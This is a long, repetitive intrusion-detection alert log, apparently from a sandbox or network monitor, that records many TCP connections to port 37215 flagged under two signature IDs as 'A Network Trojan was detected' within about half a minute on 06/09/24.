          SID:2829579
          Source Port:37118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285569
          SID:2829579
          Source Port:57378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.013180
          SID:2835222
          Source Port:60232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.937871
          SID:2835222
          Source Port:46494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720930
          SID:2835222
          Source Port:35930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.943349
          SID:2829579
          Source Port:40184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035461
          SID:2829579
          Source Port:40802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.297032
          SID:2835222
          Source Port:45192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890469
          SID:2835222
          Source Port:42912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253250
          SID:2829579
          Source Port:47980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278991
          SID:2835222
          Source Port:57504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923214
          SID:2835222
          Source Port:38000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205520
          SID:2835222
          Source Port:58102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915116
          SID:2829579
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822855
          SID:2829579
          Source Port:47444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718407
          SID:2829579
          Source Port:60068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306485
          SID:2829579
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988446
          SID:2835222
          Source Port:59472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036507
          SID:2835222
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604884
          SID:2835222
          Source Port:46950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275923
          SID:2829579
          Source Port:53584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924582
          SID:2835222
          Source Port:38150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252641
          SID:2835222
          Source Port:35432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719354
          SID:2829579
          Source Port:43464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895630
          SID:2829579
          Source Port:48672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102445
          SID:2835222
          Source Port:46760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924706
          SID:2835222
          Source Port:47742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292915
          SID:2829579
          Source Port:59048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563563
          SID:2835222
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643709
          SID:2829579
          Source Port:50900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893864
          SID:2835222
          Source Port:52178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038107
          SID:2835222
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473811
          SID:2835222
          Source Port:57878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476500
          SID:2829579
          Source Port:47388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034233
          SID:2829579
          Source Port:59158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930079
          SID:2829579
          Source Port:60378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399724
          SID:2835222
          Source Port:44786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205834
          SID:2835222
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645759
          SID:2835222
          Source Port:53782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285068
          SID:2829579
          Source Port:59708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156673
          SID:2835222
          Source Port:41598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821771
          SID:2829579
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287241
          SID:2829579
          Source Port:59550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917020
          SID:2829579
          Source Port:41688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928683
          SID:2829579
          Source Port:39522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248774
          SID:2829579
          Source Port:60308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539372
          SID:2835222
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473642
          SID:2835222
          Source Port:56068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160449
          SID:2835222
          Source Port:57350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952256
          SID:2829579
          Source Port:33140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162604
          SID:2829579
          Source Port:44326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417960
          SID:2829579
          Source Port:33560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861367
          SID:2835222
          Source Port:37136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105287
          SID:2829579
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990423
          SID:2835222
          Source Port:50522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865125
          SID:2835222
          Source Port:60952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415462
          SID:2829579
          Source Port:44120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245940
          SID:2829579
          Source Port:58752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283619
          SID:2835222
          Source Port:45406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478887
          SID:2829579
          Source Port:60886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601949
          SID:2835222
          Source Port:34500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820379
          SID:2829579
          Source Port:38610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719390
          SID:2829579
          Source Port:57674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205480
          SID:2829579
          Source Port:52584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897631
          SID:2829579
          Source Port:40280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720107
          SID:2829579
          Source Port:36384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894642
          SID:2829579
          Source Port:33302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865106
          SID:2835222
          Source Port:52782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713029
          SID:2829579
          Source Port:47966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133328
          SID:2835222
          Source Port:56916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916032
          SID:2835222
          Source Port:60970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283694
          SID:2829579
          Source Port:56776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868004
          SID:2835222
          Source Port:43168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.992243
          SID:2829579
          Source Port:57718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915813
          SID:2835222
          Source Port:56428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718313
          SID:2829579
          Source Port:47572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397586
          SID:2829579
          Source Port:51986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469436
          SID:2829579
          Source Port:37704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074449
          SID:2835222
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890388
          SID:2835222
          Source Port:41826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008625
          SID:2829579
          Source Port:44548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946982
          SID:2835222
          Source Port:36666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606012
          SID:2835222
          Source Port:43816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869939
          SID:2835222
          Source Port:34478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224663
          SID:2829579
          Source Port:34564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397554
          SID:2835222
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241832
          SID:2829579
          Source Port:54246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032892
          SID:2829579
          Source Port:38270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818172
          SID:2829579
          Source Port:45254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418946
          SID:2829579
          Source Port:33046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159469
          SID:2835222
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.043085
          SID:2829579
          Source Port:33836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034106
          SID:2829579
          Source Port:34758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206799
          SID:2829579
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288078
          SID:2829579
          Source Port:56132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714128
          SID:2835222
          Source Port:49330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287505
          SID:2835222
          Source Port:41350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635007
          SID:2829579
          Source Port:37548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230546
          SID:2829579
          Source Port:43906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076216
          SID:2829579
          Source Port:39108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169004
          SID:2835222
          Source Port:33246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.092429
          SID:2829579
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916944
          SID:2835222
          Source Port:47560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465513
          SID:2829579
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158245
          SID:2829579
          Source Port:44482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168302
          SID:2835222
          Source Port:57674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289456
          SID:2835222
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538710
          SID:2835222
          Source Port:40210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989622
          SID:2829579
          Source Port:56912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718819
          SID:2829579
          Source Port:53628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990345
          SID:2835222
          Source Port:35012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411795
          SID:2835222
          Source Port:47736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944584
          SID:2835222
          Source Port:45124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077551
          SID:2835222
          Source Port:57052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571471
          SID:2835222
          Source Port:45236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867078
          SID:2835222
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946246
          SID:2835222
          Source Port:40730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230352
          SID:2835222
          Source Port:46348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924552
          SID:2835222
          Source Port:59216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989764
          SID:2835222
          Source Port:40566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078087
          SID:2835222
          Source Port:45752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714955
          SID:2829579
          Source Port:48472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414606
          SID:2829579
          Source Port:35034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946215
          SID:2835222
          Source Port:49234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472339
          SID:2835222
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474701
          SID:2835222
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.681985
          SID:2829579
          Source Port:40454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036962
          SID:2835222
          Source Port:39322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635080
          SID:2835222
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646146
          SID:2829579
          Source Port:57192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294393
          SID:2835222
          Source Port:36986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245566
          SID:2835222
          Source Port:49602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280677
          SID:2829579
          Source Port:45436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651643
          SID:2829579
          Source Port:33668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714211
          SID:2835222
          Source Port:58742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823509
          SID:2835222
          Source Port:37492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082072
          SID:2835222
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696354
          SID:2829579
          Source Port:60526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894480
          SID:2829579
          Source Port:37422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246172
          SID:2829579
          Source Port:38892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716527
          SID:2829579
          Source Port:50808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928174
          SID:2835222
          Source Port:46176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396952
          SID:2835222
          Source Port:52680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272016
          SID:2835222
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413107
          SID:2829579
          Source Port:35080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996695
          SID:2835222
          Source Port:58132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400227
          SID:2835222
          Source Port:38302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028664
          SID:2835222
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169456
          SID:2835222
          Source Port:37736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399904
          SID:2835222
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163310
          SID:2829579
          Source Port:52554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417581
          SID:2829579
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301162
          SID:2835222
          Source Port:42936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289088
          SID:2835222
          Source Port:60962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166596
          SID:2835222
          Source Port:38642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.723501
          SID:2835222
          Source Port:49968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397536
          SID:2835222
          Source Port:58448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468900
          SID:2835222
          Source Port:48944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945150
          SID:2835222
          Source Port:34766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868775
          SID:2835222
          Source Port:59308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929409
          SID:2829579
          Source Port:50146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287295
          SID:2829579
          Source Port:48074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864400
          SID:2829579
          Source Port:46652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895882
          SID:2835222
          Source Port:48032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564215
          SID:2829579
          Source Port:35256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557944
          SID:2829579
          Source Port:50076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168766
          SID:2829579
          Source Port:36892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418191
          SID:2829579
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559756
          SID:2829579
          Source Port:50740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.941956
          SID:2829579
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867984
          SID:2835222
          Source Port:54474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910466
          SID:2835222
          Source Port:41268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285515
          SID:2835222
          Source Port:58724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169340
          SID:2829579
          Source Port:51006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604683
          SID:2835222
          Source Port:52318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.295560
          SID:2829579
          Source Port:48366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067225
          SID:2835222
          Source Port:51166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946873
          SID:2835222
          Source Port:33874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205312
          SID:2829579
          Source Port:44892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929219
          SID:2835222
          Source Port:45404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718777
          SID:2829579
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947955
          SID:2829579
          Source Port:37200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928954
          SID:2835222
          Source Port:39022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275565
          SID:2829579
          Source Port:38476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250676
          SID:2835222
          Source Port:45928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397903
          SID:2829579
          Source Port:34468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414684
          SID:2829579
          Source Port:50010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247336
          SID:2829579
          Source Port:50722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818195
          SID:2829579
          Source Port:53876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224178
          SID:2835222
          Source Port:55678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.652897
          SID:2835222
          Source Port:42072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867781
          SID:2829579
          Source Port:48426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296425
          SID:2829579
          Source Port:46448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078951
          SID:2835222
          Source Port:50960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206742
          SID:2829579
          Source Port:52422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163151
          SID:2835222
          Source Port:35198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988569
          SID:2835222
          Source Port:44494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987283
          SID:2835222
          Source Port:42790
          Destination Port:37215
